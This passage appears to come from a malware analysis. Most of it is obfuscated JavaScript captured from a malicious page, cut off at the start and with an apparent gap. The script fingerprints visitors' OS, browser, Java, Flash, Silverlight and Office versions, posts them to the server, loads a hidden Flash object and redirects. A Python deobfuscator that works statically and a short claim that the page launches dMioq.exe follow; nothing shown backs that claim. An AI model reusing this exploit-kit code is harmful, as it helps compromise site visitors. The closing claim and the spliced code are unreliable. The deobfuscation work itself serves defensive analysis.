qR="ement",xx="l",Vf="createE"; return Vf+xx+qR })())])return false;var x=document[((function () { var Wy="ement",w7="teEl",uF="crea"; return uF+w7+Wy })())](String.fromCharCode(105,0156,0160,0x75,0x74));x[((function () { var Vi="ribute",M6="setAtt"; return M6+Vi })())]((function () { var y1='e',gt='typ'; return gt+y1 })(),St);return x[(String.fromCharCode(0164,0171,0x70,0145))]==St;};var vM=function(ut){try{eval(ut);return true;} catch(Zg){}return false;};if(window[((function () { var u="era",h_="op"; return h_+u })())]){RF=y;if(!navigator[((function () { var gq="Agent",eI="user"; return eI+gq })())][(String.fromCharCode(0x6d,0x61,0164,99,104))](/Opera/)){v5=true;}DZ=window[String.fromCharCode(0x6f,0x70,0x65,114,0141)][(String.fromCharCode(0x76,101,114,0163,0x69,0x6f,110))]();if(!NZ){switch(window[(function () { var Qc="a",cm="r",Uk="pe",rE="o"; return rE+Uk+cm+Qc })()][((function () { var XX="mber",bx="u",IZ="buildN"; return IZ+bx+XX })())]((function () { var $P='us',er='o',pF='cu',zW='conspi',X='in'; return X+zW+pF+er+$P })())){case String.fromCharCode(51,064,0x34):case (function () { var r2="7",R="4",dj="13"; return dj+R+r2 })():case String.fromCharCode(0x32,48,0x39,49):case String.fromCharCode(50,064,064,52):case (function () { var CG="4",lp="7",S="24"; return S+lp+CG })():case (function () { var cZ="2",L3="10",zm="4"; return zm+L3+cZ })():case String.fromCharCode(066,51,070,54):NZ=g;break;case (function () { var ZO="4",kv="7",mN="10"; return mN+kv+ZO })():case (function () { var ft="00",h6="1",_t="1"; return _t+h6+ft })():case String.fromCharCode(063,064,52,065):case (function () { var wv="6",uS="351"; return uS+wv })():case String.fromCharCode(55,067,51,060):case String.fromCharCode(070,065,48,0x32):case String.fromCharCode(56,0x36,55,57):case String.fromCharCode(0x38,0x37,55,49):case String.fromCharCode(56,067,55,54):case String.fromCharCode(070,070,0x30,49):case String.fromCharCode(061,48,49,0x30,56):case (function () { var sA="7",fn="6",Tn="4",M2="10"; 
})()]=function(cF,GA){if(cF==GA){return ('FoV'.length-3);}window[String.fromCharCode(0x61)]=cF[((function () { var F7="it",cR="spl"; return cR+F7 })())]((function () { var Zq="."; return Zq })());window[String.fromCharCode(0142)]=GA[(String.fromCharCode(115,112,0154,0151,0164))](String.fromCharCode(056));for(var $=('kkjsrhX'.length-7);$<Math[(String.fromCharCode(0155,0x61,0x78))](window[(function () { var X="a"; return X })()][((function () { var x8="h",t="engt",l="l"; return l+t+x8 })())],window[String.fromCharCode(0142)][((function () { var qS="h",w7="ngt",u="le"; return u+w7+qS })())]);$++){if(!window[(function () { var vX="b"; return vX })()][$]){window[(function () { var b5="b"; return b5 })()][$]=String.fromCharCode(060);}if(!window[(function () { var OO="a"; return OO })()][$]){window[(function () { var iv="a"; return iv })()][$]=String.fromCharCode(0x30);}if(window[String.fromCharCode(0141)][$]==window[String.fromCharCode(0142)][$]){continue;}window[(function () { var z="t",GZ="in",wQ="_",j4="a"; return j4+wQ+GZ+z })()]=window[(function () { var Qg="t",O_="In",jPu="parse"; return jPu+O_+Qg })()](window[String.fromCharCode(0x61)][$]);window[String.fromCharCode(0x62,0137,0151,0156,0x74)]=window[String.fromCharCode(0x70,0x61,114,0x73,101,73,0x6e,0x74)](window[String.fromCharCode(0x62)][$]);window[(function () { var H$="st",SY="a_re"; return SY+H$ })()]=window[(function () { var W="a"; return W })()][$][(String.fromCharCode(115,0x75,0x62,0x73,0x74,114))](window[String.fromCharCode(97,0137,0151,0x6e,0x74)][((function () { var Ew="ng",e="Stri",$B="o",uw="t"; return uw+$B+e+Ew })())]()[(String.fromCharCode(108,0145,110,0147,0x74,0x68))]);window[(function () { var Qe="st",ZR="b_re"; return ZR+Qe })()]=window[(function () { var hm="b"; return hm })()][$][((function () { var ga="tr",ke="subs"; return ke+ga })())](window[(function () { var FA="t",cC="n",qP="b_i"; return qP+cC+FA })()][((function () { var QD="g",jN="n",Qp="oStri",ru="t"; return ru+Qp+jN+QD 
})())]()[((function () { var yX="th",xe="leng"; return xe+yX })())]);if(window[String.fromCharCode(0141,95,0x69,110,0164)]<window[String.fromCharCode(98,95,0151,0x6e,116)]){return -'E'.length;}else if(window[(function () { var jl="t",Vh="n",nEL="i",FY="a_"; return FY+nEL+Vh+jl })()]>window[(function () { var sW="t",W3="n",l3="i",Te="b_"; return Te+l3+W3+sW })()]){return 'V'.length;}else {if(window[(function () { var I83="t",Jj="res",jD="a_"; return jD+Jj+I83 })()]==String.fromCharCode(98)&&window[String.fromCharCode(0142,0x5f,114,101,0x73,0164)][((function () { var Wz="th",r="leng"; return r+Wz })())]==('j'.length-1)){return -'U'.length;}if(window[(function () { var dR="t",xp="res",JS="_",sM="b"; return sM+JS+xp+dR })()]==(function () { var RF="b"; return RF })()&&window[String.fromCharCode(0141,0x5f,0162,0145,0163,116)][(String.fromCharCode(0x6c,0145,110,0147,0164,0x68))]==('aYycEhtQE'.length-9)){return 'T'.length;}if(window[String.fromCharCode(0141,0x5f,0x72,0145,0x73,0x74)]<window[String.fromCharCode(0x62,0137,0162,101,0163,0x74)]){return -'n'.length;}else if(window[String.fromCharCode(0x61,95,0162,101,0163,116)]>window[String.fromCharCode(0x62,0x5f,114,101,115,0164)]){return 'y'.length;}}}return ('U'.length-1);};window[String.fromCharCode(117,0x61,95,0x76,0145,0162,95,108,0x74)]=function(l,UT){if(-'y'.length==this[(String.fromCharCode(0x75,0x61,0x5f,0x76,0145,114,95,99,0x6d,0160))](l,UT)){return true;}return false;};window[String.fromCharCode(117,97,95,0166,101,0162,0x5f,103,0x74)]=function(l,UT){if('C'.length==this[((function () { var S7="mp",$m="ver_c",zz="_",e="a",$j="u"; return $j+e+zz+$m+S7 })())](l,UT)){return true;}return false;};window[String.fromCharCode(0x75,97,0137,0x76,0x65,114,0137,0145,113)]=function(l,UT){if(('jPo'.length-3)==this[((function () { var S8="er_cmp",S="a_v",Dz="u"; return Dz+S+S8 })())](l,UT)){return true;}return false;};if(!window[(String.fromCharCode(88,0x4d,76,0110,84,84,0120,0x52,101,0x71,0165,0145,115,0x74))]){(function(){var 
Ub,Ej=[String.fromCharCode(77,105,0x63,0162,111,0x73,111,0146,0164,056,0130,0x4d,76,0110,0x54,0124,80),(function () { var $="TP",tm="HT",t="2.XML",PM="Msxml"; return PM+t+tm+$ })(),(function () { var OB="P.6.0",TS="ml2.XMLHTT",XJ="Msx"; return XJ+TS+OB })(),(function () { var fg="TP.3.0",rc="HT",d="2.XML",fj="xml",lP="Ms"; return lP+fj+d+rc+fg })()];for(Ub=('ty'.length-2);Ub<Ej[((function () { var pB="h",r="gt",YE="en",Qt="l"; return Qt+YE+r+pB })())];Ub++){try{new ActiveXObject(Ej[Ub]);window[((function () { var HM="uest",Gr="Req",eP="XMLHttp"; return eP+Gr+HM })())]=function(){return new ActiveXObject(Ej[Ub]);};break;} catch(h){}}})();}function T(bz,W,lp){var XH=new XMLHttpRequest();if(XH[(String.fromCharCode(0x6f,118,101,0x72,0x72,0151,0x64,101,0x4d,0151,109,101,0124,0x79,0160,101))]){XH[(String.fromCharCode(111,118,0145,114,114,0151,0144,0x65,77,0x69,109,0145,0x54,0x79,0160,0145))](String.fromCharCode(0x74,101,0170,0x74,057,112,0154,0141,0151,0x6e,59,040,99,0150,97,0x72,0x73,0145,0164,075,0x78,45,0165,0x73,0x65,0x72,0x2d,100,0x65,102,105,110,101,0144));}XH[(String.fromCharCode(111,0x70,0145,110))](String.fromCharCode(0120,79,83,0124),bz,!!lp);if(lp){XH[((function () { var $="hange",cw="eadystatec",Vl="onr"; return Vl+cw+$ })())]=function(){if(XH[((function () { var dS="tate",D0="readyS"; return D0+dS })())]=='Iwct'.length){lp[(String.fromCharCode(97,0160,0x70,0x6c,0x79))](this,arguments);}};}XH[((function () { var BI="d",z9="en",P1="s"; return P1+z9+BI })())](W);return XH;}var gi={};gi[((function () { var D="ht",ju="ilverlig",d="S",t="has"; return t+d+ju+D })())]=function(){var Ug=false;try{var CM=new ActiveXObject(String.fromCharCode(0101,0147,67,0x6f,0x6e,116,0162,0157,0154,46,0x41,0x67,67,111,110,116,114,111,0x6c));Ug=true;} catch(bu){}if(!Ug){var D4=window[(String.fromCharCode(110,0x61,118,0151,0147,0141,0164,0157,0162))][(String.fromCharCode(109,0151,0x6d,101,0124,0x79,0160,0x65,115))];for(var SH=('gMeRWTdDIT'.length-10);SH<D4[((function () { var 
gF="h",hQ="gt",qa="len"; return qa+hQ+gF })())];SH++){if(/x\-silverlight/[(String.fromCharCode(116,0x65,0163,0x74))](D4[SH][((function () { var yH="ype",Ex="t"; return Ex+yH })())])){Ug=true;break;}}}if(!Ug){var sZ=navigator[(String.fromCharCode(112,0154,117,0x67,0151,0156,115))][(String.fromCharCode(0154,0145,0x6e,103,0x74,0150))];for(var JG=('MW'.length-2);JG<sZ;JG++){var fe=navigator[((function () { var TJ="ns",Z7="lugi",r="p"; return r+Z7+TJ })())][JG][(String.fromCharCode(110,97,0x6d,0x65))];if(/Silverlight Plug\-In/[((function () { var JX="t",Pu="tes"; return Pu+JX })())](fe)){Ug=true;break;}}}return Ug;};gi[(String.fromCharCode(103,0145,0x74,0106,0x6c,0x61,115,0x68,86,0x65,0x72,0x73,105,111,0156))]=function(){var j$=null;try{var R=new ActiveXObject(String.fromCharCode(0x53,104,0157,0x63,107,0167,97,0166,0x65,0x46,0x6c,97,115,0150,056,83,104,0157,0143,107,119,0x61,0x76,0145,0106,0154,0141,0163,0x68))[(String.fromCharCode(0107,101,116,86,0141,0x72,0x69,0141,98,0x6c,0145))]((function () { var S='on',ZN='si',a9='$ver'; return a9+ZN+S })())[(String.fromCharCode(0164,111,0x53,0164,0162,0151,0x6e,0x67))]();j$=R[((function () { var GF="ch",PV="t",kz="a",ho="m"; return ho+kz+PV+GF })())](/[\d,]+/g)[('aw'.length-2)][(String.fromCharCode(0162,0x65,0160,108,0x61,99,101))](/,/g,String.fromCharCode(056));} catch(lK){}if(j$==null){var yS=window[((function () { var sI="r",kr="to",Gb="a",eQ="g",R="navi"; return R+eQ+Gb+kr+sI })())][((function () { var wr="es",qq="yp",S="mimeT"; return S+qq+wr })())];for(var Zl=('uSWqgTVXt'.length-9);Zl<yS[((function () { var Yw="h",z="ngt",T5="le"; return T5+z+Yw })())];Zl++){var Te=yS[Zl][((function () { var QR="Plugin",$="enabled"; return $+QR })())][(String.fromCharCode(100,0145,0163,0143,0162,0x69,0x70,116,0x69,0157,0x6e))][((function () { var qB="ing",kX="Str",sp="o",bo="t"; return bo+sp+kX+qB })())]();var aE=Te[((function () { var Wj="h",Lg="atc",u="m"; return u+Lg+Wj })())](/Shockwave Flash 
[\d\.]+/g);if(aE!=null){j$=aE[('YfeWbUvBEx'.length-10)][((function () { var G_="h",h="c",JL="t",X="a",mG="m"; return mG+X+JL+h+G_ })())](/\d.+/g)[('WUCAVeyGyW'.length-10)];break;}}}if(j$==null){var pq=navigator[((function () { var Yl="s",t7="gin",K6="plu"; return K6+t7+Yl })())][((function () { var uf="h",vD="gt",e="en",d$="l"; return d$+e+vD+uf })())];for(window[String.fromCharCode(0x69)]=('hAQvnzz'.length-7);window[(function () { var Vb="i"; return Vb })()]<pq;window[(function () { var er="i"; return er })()]++){var G7=navigator[(String.fromCharCode(0160,0x6c,0x75,0x67,0x69,0156,115))][window[(function () { var IN="i"; return IN })()]][(String.fromCharCode(0156,97,0155,101))];var u=navigator[(String.fromCharCode(0160,0154,0x75,0147,0151,0156,115))][window[(function () { var A9="i"; return A9 })()]][(String.fromCharCode(0x76,101,0x72,115,105,0157,0156))];if(/Shockwave Flash/[(String.fromCharCode(0x74,101,0x73,0164))](G7)&&u!=window[(function () { var J="ed",D2="fin",R4="unde"; return R4+D2+J })()]){j$=navigator[((function () { var Px="s",$B="n",$="i",S="plug"; return S+$+$B+Px })())][window[String.fromCharCode(105)]][(String.fromCharCode(118,0145,0x72,0163,0x69,111,110))];break;}}}return j$;};gi[(String.fromCharCode(0147,0x65,0164,0x4a,97,0166,0141,0126,0145,0162,0x73,0151,111,110))]=function(){var xY=null;for(var hF=('HFc'.length-3);hF<('D'.length*'KUCqYPb'.length+3);hF++){for(var r=('LCLJA'.length-5);r<('Q'.length*011+1);r++){for(var $=('nHv'.length-3);$<('t'.length*'cVAzMCAiP'.length+1);$++){for(var X=('VwSfBFMT'.length-8);X<(0xa*'B'.length+0);X++){var NB=String(hF)+String.fromCharCode(46)+String(r)+(function () { var hP="."; return hP })()+String($)+(function () { var G9="."; return G9 })()+String(X);var CL=(function () { var ol="stalled.",KU="isIn",u="JavaWebStart."; return u+KU+ol })()+NB;try{new ActiveXObject(CL);return NB;} catch(g3){continue;}}}}}if(xY==null){var xK=window[((function () { var e="or",Ly="at",OK="navig"; return OK+Ly+e })())][((function () 
{ var oM="s",K8="e",D$="p",PE="y",kC="imeT",NJ="m"; return NJ+kC+PE+D$+K8+oM })())];for(var er=('nQfpcnjDkv'.length-10);er<xK[((function () { var qY="ngth",J="le"; return J+qY })())];er++){var BI=/java.+;version=(.+)/[((function () { var Zo="c",As="exe"; return As+Zo })())](xK[er][(String.fromCharCode(0x74,0171,112,0x65))]);if(BI){var WC=window[(function () { var uJ="oat",mK="seFl",uG="par"; return uG+mK+uJ })()](BI['S'.length]);if(WC>xY){xY=WC;}}}}if(xY==null){var Ns="";var JZ=navigator[((function () { var YE="ns",rY="i",pB="g",KK="plu"; return KK+pB+rY+YE })())][((function () { var e="h",Q7="engt",yu="l"; return yu+Q7+e })())];for(window[(function () { var yo="i"; return yo })()]=('lWftROCw'.length-8);window[(function () { var VD="i"; return VD })()]<JZ;window[(function () { var ue="i"; return ue })()]++){var On=navigator[((function () { var q3="ins",pg="plug"; return pg+q3 })())][window[(function () { var ah="i"; return ah })()]][(String.fromCharCode(0x6e,0141,0155,0x65))];var LQ=navigator[(String.fromCharCode(0x70,0x6c,0165,0147,105,110,115))][window[String.fromCharCode(105)]][(String.fromCharCode(118,0x65,114,0x73,0151,0x6f,0x6e))];if(/Java/[((function () { var X="est",Tn="t"; return Tn+X })())](On)&&LQ!=window[String.fromCharCode(117,0156,0x64,0145,0146,105,110,101,0144)]){xY=navigator[(String.fromCharCode(0160,0x6c,117,103,105,0x6e,0163))][window[(function () { var ky="i"; return ky })()]][((function () { var R="sion",Cy="ver"; return Cy+R })())];break;}}}return xY;};var Y={};Y[((function () { var V3="eX",J7="sActiv",Qt="ha"; return Qt+J7+V3 })())]=function(du,nX){var $=null;if(du[((function () { var l4="ring",NP="st",KF="b",av="su"; return av+KF+NP+l4 })())](('IEi'.length-3),'p'.length)==String[((function () { var gF="ode",Xd="rC",rs="fromCha"; return rs+Xd+gF 
})())]((0x1*((01*('KIa'.length*0x6+0)+7)*'SrI'.length+2)+46))){$=document[(String.fromCharCode(0143,0x72,0x65,0141,0x74,101,0x45,0154,101,0x6d,0145,0x6e,0x74))](String.fromCharCode(111,0x62,106,101,99,116));$[(String.fromCharCode(0163,101,0164,0101,0x74,116,114,105,0x62,117,116,101))](String.fromCharCode(0143,108,0x61,115,0163,0151,0x64),(function () { var qZ=":",J="d",QS="clsi"; return QS+J+qZ })()+du);$[((function () { var wp="e",S="tribut",N_="t",BN="setA"; return BN+N_+S+wp })())]((function () { var xU="d",Cf="i"; return Cf+xU })(),du);$[(String.fromCharCode(115,0x65,0164,0101,0164,0x74,0x72,0x69,0x62,0165,0164,0145))]((function () { var Fs="le",r="y",X="t",e="s"; return e+X+r+Fs })(),(function () { var VB=": hidden",kG="visibility"; return kG+VB })());$[(String.fromCharCode(0x73,0x65,116,65,0164,116,114,0151,98,0165,116,101))]((function () { var qE="h",vb="t",bL="wid"; return bL+vb+qE })(),(function () { var XT="x",IN="p",R9="0"; return R9+IN+XT })());$[(String.fromCharCode(115,0x65,0x74,0101,0x74,0x74,0x72,105,0x62,0x75,0164,0145))](String.fromCharCode(104,0x65,105,103,0150,0164),(function () { var fw="x",dV="p",R="0"; return R+dV+fw })());document[((function () { var ol="ody",hH="b"; return hH+ol })())][((function () { var PX="Child",PR="append"; return PR+PX })())]($);if(typeof ($[nX])==String.fromCharCode(0165,110,0x64,101,102,0x69,0156,101,0x64)){var Cv=String.fromCharCode(105,0x64,61,0x22)+du+String.fromCharCode(042);Cv+=String.fromCharCode(040,99,0x6c,97,0163,0163,105,0x64,075,34,0x63,108,0x73,105,0x64,072)+du+(function () { var Rc='"'; return Rc })();Cv+=String.fromCharCode(040,0x73,116,0171,108,0x65,075,34,0166,105,0163,105,0x62,0x69,0x6c,105,0164,0171,0x3a,32,0x68,0151,0144,0x64,0x65,0156,0x22);Cv+=(function () { var K0='height="0px"',fq=' width="0px" '; return fq+K0 })();document[((function () { var gf="dy",Ml="o",z="b"; return z+Ml+gf 
})())][(String.fromCharCode(105,0x6e,0x6e,101,0x72,72,84,77,76))]+=String.fromCharCode(074,0157,0142,0152,101,0x63,0164,32)+Cv+String.fromCharCode(076,60,47,111,0142,0152,101,99,0164,62);$=document[((function () { var La="ntById",NU="getEleme"; return NU+La })())](du);}}else {try{$=new ActiveXObject(du);} catch(oE){return false;};}if(typeof ($[nX])!=(function () { var u='ed',JP='in',Dm='undef'; return Dm+JP+u })()){return true;}return false;};Y[((function () { var r7="eVersion",gO="getMsOffic"; return gO+r7 })())]=function(){var lk;var FO=new Array();for(var C4='E'.length;C4<='WQcYw'.length;C4++){try{FO[C4-'u'.length]=typeof (new ActiveXObject(String.fromCharCode(0x53,104,0x61,0162,0145,80,0157,0x69,110,0164,46,0117,0x70,101,0x6e,68,111,0143,0x75,0155,0145,0156,116,115,0x2e)+C4[(String.fromCharCode(0x74,0157,0123,0164,0x72,0x69,0156,103))]()));} catch(u){FO[C4-'F'.length]=null;}}if(FO[('AdKsojil'.length-8)]==(function () { var Ss='t',fR='c',xV='obje'; return xV+fR+Ss })()&&FO['U'.length]==String.fromCharCode(111,0142,0152,0145,0143,116)&&FO['EE'.length]==String.fromCharCode(111,0142,0x6a,0x65,0x63,0164)&&FO['RSa'.length]==String.fromCharCode(0157,0x62,0x6a,0x65,0x63,116)&&FO['gtvs'.length]==(function () { var da='t',By='bjec',Pn='o'; return Pn+By+da })()){lk=(function () { var Uj="2",w_="201"; return w_+Uj })();}else if(FO[('lj'.length-2)]==(function () { var e='t',J='c',S9S='bje',U6='o'; return U6+S9S+J+e })()&&FO['I'.length]==(function () { var UD='ct',wJ='je',$R='ob'; return $R+wJ+UD })()&&FO['WS'.length]==String.fromCharCode(0157,98,0x6a,0x65,99,0x74)&&FO['bpX'.length]==(function () { var I2='t',_Z='bjec',W0='o'; return W0+_Z+I2 })()&&FO['XjzE'.length]==null){lk=(function () { var Rd="0",X="201"; return X+Rd })();}else if(FO[('CdOvxm'.length-6)]==(function () { var Bd='ect',WB='j',HI='ob'; return HI+WB+Bd })()&&FO['U'.length]==(function () { var S='ect',ck='j',UK='ob'; return UK+ck+S 
})()&&FO['hB'.length]==String.fromCharCode(111,0142,0x6a,101,0143,0164)&&FO['tnr'.length]==null&&FO['hzcK'.length]==null){lk=String.fromCharCode(062,0x30,060,067);}else if(FO[('ooUhV'.length-5)]==(function () { var h='ct',F6='obje'; return F6+h })()&&FO['W'.length]==String.fromCharCode(111,0x62,106,101,0143,0x74)&&FO['Gw'.length]==null&&FO['nGL'.length]==null&&FO['rgXO'.length]==null){lk=(function () { var $X="03",Vg="20"; return Vg+$X })();}else if(FO[('iKS'.length-3)]==(function () { var X='ct',fM='bje',OG='o'; return OG+fM+X })()&&FO['w'.length]==null&&FO['ln'.length]==null&&FO['Gba'.length]==null&&FO['kXFx'.length]==null){lk=String.fromCharCode(0x78,112);}else {lk=null;}return lk;};function lZ(OR){var Rn=[];for(var Ho in OR){Rn[((function () { var Ol="sh",S="u",oU="p"; return oU+S+Ol })())](window[(function () { var ZE="onent",sn="omp",bP="encodeURIC"; return bP+sn+ZE })()](Ho)+(function () { var x9='='; return x9 })()+window[String.fromCharCode(101,110,0143,0157,0x64,0145,85,82,73,0x43,111,0155,0160,0x6f,0x6e,0x65,110,116)](OR[Ho]));}return N[((function () { var Lk="e",R="d",$d="co",UR="en"; return UR+$d+R+Lk })())](Rn[(String.fromCharCode(0x6a,111,105,0x6e))]((function () { var z3='&'; return z3 })()));}function G(Em){return (!Em||('vcEGqa'.length-6)===Em[((function () { var gj="th",tw="g",pq="n",BB="le"; return BB+pq+tw+gj })())]);}function U(qx){var X=lZ(qx);T(String.fromCharCode(47,0x52,114,0156,0x63,0x6f,057),X,function(){window[(String.fromCharCode(0x6c,0x6f,0143,0141,0x74,105,111,0x6e))]=(function () { var J="it/",MW="/ylCN"; return MW+J })();});}var QM="";var _=true;var dB=null;var W2=null;function K(ZM){QM=ZM;if(dB!=null){window[(function () { var mG="meout",I8="learTi",Ed="c"; return Ed+I8+mG })()](dB);dB=null;}_=false;return;}function E(SU,TD,vl){var RMp,cR,C3,OR,Nn0=TD||{},o8=vl||{};Nn0[((function () { var r="e",Dv="p",ev="ty"; return ev+Dv+r })())]=(function () { var $='ockwave-flash',ad='h',rB='application/x-s'; return rB+ad+$ 
})();if(window[(String.fromCharCode(0101,99,0164,105,118,101,88,0x4f,98,0x6a,0145,0x63,0164))]){Nn0[(String.fromCharCode(99,0154,0x61,0163,0x73,105,0x64))]=(function () { var O6='cf-96b8-444553540000',qv='clsid:d27cdb6e-ae6d-11'; return qv+O6 })();o8[(String.fromCharCode(0x6d,111,0x76,0x69,0x65))]=SU;}else {Nn0[(String.fromCharCode(100,0141,0164,97))]=SU;}cR=(function () { var le='t',uC='ec',b$='<obj'; return b$+uC+le })();for(RMp in Nn0){cR+=(function () { var un=' '; return un })()+RMp+(function () { var Hv='"',e='='; return e+Hv })()+Nn0[RMp]+(function () { var yq='"'; return yq })();}cR+=String.fromCharCode(076);for(RMp in o8){cR+=String.fromCharCode(0x3c,0160,97,0162,0141,109,040,110,0141,0x6d,101,075,042)+RMp+(function () { var rw='"',tN='lue=',N$='" va'; return N$+tN+rw })()+o8[RMp]+(function () { var ik='>',e='" /'; return e+ik })();}cR+=String.fromCharCode(60,0x2f,0157,0142,106,101,0x63,0x74,0x3e);C3=document[((function () { var U0="t",Kv="eElemen",U3="eat",r1="cr"; return r1+U3+Kv+U0 })())]((function () { var j6='v',DC='i',xB='d'; return xB+DC+j6 })());C3[((function () { var OX="HTML",sw="inner"; return sw+OX })())]=cR;OR=C3[((function () { var Cm="hild",Be="firstC"; return Be+Cm })())];C3[((function () { var h7="hild",ul="C",Fd="remove"; return Fd+ul+h7 })())](OR);return OR;}window[((function () { var P3="d",qo="oa",R="onl"; return R+qo+P3 })())]=function(){var $=Z1[((function () { var iF="on",qH="i",Jx="s",S="getVer"; return S+Jx+qH+iF })())]();var Hi={"os_vendor":$[((function () { var KL="endor",uS="os_v"; return uS+KL })())],"os_device":$[((function () { var UX="vice",n5="os_de"; return n5+UX })())],"ua_name":$[(String.fromCharCode(0x75,97,0137,110,0x61,0155,101))],"ua_ver":$[((function () { var $p="sion",KI="er",zN="_v",gN="ua"; return gN+zN+KI+$p })())],"arch":$[(String.fromCharCode(0141,114,0143,104))],"java":gi[((function () { var jS="Version",pm="va",h6="etJa",z="g"; return z+h6+pm+jS 
})())](),"silverlight":gi[(String.fromCharCode(104,97,0x73,83,0151,0x6c,0x76,101,114,0154,0x69,0x67,104,0164))](),"flash":gi[(String.fromCharCode(103,101,0164,0106,0x6c,97,0163,104,86,0x65,0162,0x73,0x69,0x6f,110))](),"vuln_test":true,"os_name":$[(String.fromCharCode(0x6f,0x73,95,0x6e,97,0155,101))]};Hi[(function () { var zO='e',s57='ffic',J='o'; return J+s57+zO })()]=Y[(String.fromCharCode(103,0145,0x74,77,0163,0117,0146,0146,0x69,0x63,0145,0126,0x65,114,115,0151,0157,0156))]();Hi[String.fromCharCode(0155,115,0x68,116,109,0x6c,0137,0x62,0x75,105,0154,0x64)]=window[(function () { var e="n",h="neBuildVersio",mG="iptEngi",xn="Scr"; return xn+mG+h+e })()]()[((function () { var r="ring",l7="St",xb="to"; return xb+l7+r })())]();if(Hi[String.fromCharCode(0146,0x6c,0141,115,0x68)]!=null&&(Hi[String.fromCharCode(0x66,0x6c,0x61,115,104)][((function () { var cs="tch",rx="a",ND="m"; return ND+rx+cs })())](/[\d]+.[\d]+.[\d]+.[\d]+/))==null){var SX=E(String.fromCharCode(057,97,0124,120,72,0144,109,0120,0x49,77,46,115,0167,0146),{"\u0077\x69\x64\u0074\u0068":'E'.length,"\x68\x65\x69\147\u0068\164":'S'.length},{"\141\u006c\x6c\157\u0077\x53\u0063\162\151\x70\u0074\101\143\143\u0065\163\163":String.fromCharCode(0141,108,0167,97,121,0163),"\x50\x6c\x61\x79":String.fromCharCode(0x54,114,0165,0x65)});dB=setTimeout(function(){if(W2!=null){_=false;window[(function () { var b7="val",ze="arInter",ps="le",Cr="c"; return Cr+ps+ze+b7 })()](W2);}if(!G(QM)){Hi[(function () { var wQ="h",oz="s",XU="fla"; return XU+oz+wQ })()]=QM;}U(Hi);},(0x1*06637+1513));W2=setInterval(function(){if(!_){window[String.fromCharCode(0x63,0154,0x65,0x61,0162,0x49,0x6e,116,0145,114,0x76,97,0154)](W2);if(!G(QM)){Hi[String.fromCharCode(102,0x6c,0x61,0x73,104)]=QM;}U(Hi);}},('rAOY'.length*027+8));document[((function () { var RR="ody",va="b"; return va+RR })())][((function () { var BY="ld",nJ="Chi",j4="append"; return j4+nJ+BY })())](SX);}else {U(Hi);}};
  </script>
  <noscript>
  <img style="visibility:hidden" src="/XDWPUmm/">
  <meta http-equiv="refresh" content="1; url=/ylCNit/">
  </noscript>
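The script captured from the malicious page hides its strings and constants behind `String.fromCharCode` calls with mixed decimal, hex and octal literals, string-building IIFEs, `'...'.length` arithmetic and escape-only string literals. The following added example (not part of the original report) statically folds those constructs back into readable JavaScript without executing anything; the sample input is constructed in the same style, and all function names are assumptions of this example.

```python
import json
import re

IDENT = r"[A-Za-z_$][\w$]*"
STR = r'"[^"\\]*"' + "|" + r"'[^'\\]*'"      # quoted literal without escapes
NUM = r"\d[0-9A-Fa-fxX]*"                     # decimal, 0x hex or legacy octal

ESCAPED = re.compile(r'"((?:\\x[0-9A-Fa-f]{2}|\\u[0-9A-Fa-f]{4}|\\[0-3]?[0-7]{1,2})+)"')
ESCAPE = re.compile(r"\\(?:x([0-9A-Fa-f]{2})|u([0-9A-Fa-f]{4})|([0-3]?[0-7]{1,2}))")
CHARCODE = re.compile(r"String\.fromCharCode\(([0-9A-Fa-fxX,\s]+)\)")
IIFE = re.compile(r"\(function \(\) \{ var ((?:%s=(?:%s),?)+); return (%s(?:\+%s)*) \}\)\(\)"
                  % (IDENT, STR, IDENT, IDENT))
ASSIGN = re.compile(r"(%s)=(%s)" % (IDENT, STR))
LENGTH = re.compile(r"(%s)\.length" % STR)
ARITH = re.compile(r"\(\s*(-?\s*%s(?:\s*[-+*]\s*%s)+)\s*\)" % (NUM, NUM))
PROP = re.compile(r'(?<=[\w$\])])\[(\(*)"(%s)"(\)*)\]' % IDENT)

def js_int(tok):
    """Parse a JavaScript integer literal: 0x hex, legacy 0-prefixed octal, or decimal."""
    tok = tok.strip()
    if tok.lower().startswith("0x"):
        return int(tok, 16)
    if len(tok) > 1 and tok[0] == "0" and tok.isdigit() and not set(tok) & set("89"):
        return int(tok, 8)
    return int(tok, 10)

def _escaped(m):
    # "\157\x73\u0065" style literal made only of escapes -> plain literal
    chars = [chr(int(h or u, 16)) if (h or u) else chr(int(o, 8))
             for h, u, o in ESCAPE.findall(m.group(1))]
    return json.dumps("".join(chars))

def _charcode(m):
    try:
        return json.dumps("".join(chr(js_int(t)) for t in m.group(1).split(",")))
    except ValueError:
        return m.group(0)                     # not a plain literal list: leave as is

def _iife(m):
    # (function () { var a="x",b="y"; return b+a })() -> "yx"
    values = {name: lit[1:-1] for name, lit in ASSIGN.findall(m.group(1))}
    parts = m.group(2).split("+")
    if any(p not in values for p in parts):
        return m.group(0)
    return json.dumps("".join(values[p] for p in parts))

def _arith(m):
    # Fold a parenthesised +, -, * expression over integer literals.
    try:
        total = 0
        for sign, term in re.findall(r"([+-]?)([^+-]+)", m.group(1)):
            product = 1
            for factor in term.split("*"):
                product *= js_int(factor)
            total += -product if sign == "-" else product
    except ValueError:
        return m.group(0)
    prev = m.string[m.start() - 1] if m.start() else ""
    is_call = prev != "" and (prev.isalnum() or prev in "_$])")
    # Keep the parentheses for call/if arguments and for negative results.
    return "(%d)" % total if is_call or total < 0 else str(total)

def _prop(m):
    # obj[("name")] -> obj.name when the wrapping parentheses balance
    return "." + m.group(2) if len(m.group(1)) == len(m.group(3)) else m.group(0)

def deobfuscate(js):
    js = ESCAPED.sub(_escaped, js)
    js = CHARCODE.sub(_charcode, js)
    js = IIFE.sub(_iife, js)
    js = LENGTH.sub(lambda m: str(len(m.group(1)) - 2), js)
    while True:                               # nested arithmetic needs several passes
        folded = ARITH.sub(_arith, js)
        if folded == js:
            break
        js = folded
    return PROP.sub(_prop, js)

# Constructed sample written in the style of the captured script (not a verbatim copy).
SAMPLE = (
    r'''if(qu[(String.fromCharCode(0x69,110,100,0145,120,0117,102))]'''
    r'''((function () { var b="ws nt 5.1",a="windo"; return a+b })())!=-'x'.length)'''
    r'''{NZ=String.fromCharCode(0x57,0151,0156,0144,111,119,115,040,88,80);}'''
    r'''for(var i=('abcdefg'.length-7);i<('Z'.length*011+1);i++){}'''
    r'''return {"\157\x73\x5f\156\x61\155\u0065":NZ};'''
)

if __name__ == "__main__":
    print(deobfuscate(SAMPLE))
```

Constructs the patterns do not recognise are left untouched, so the output can be reviewed side by side with the input.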

Decoding the page shows that it calls the executable dMioq.exe; this program is the cause of the compromise.

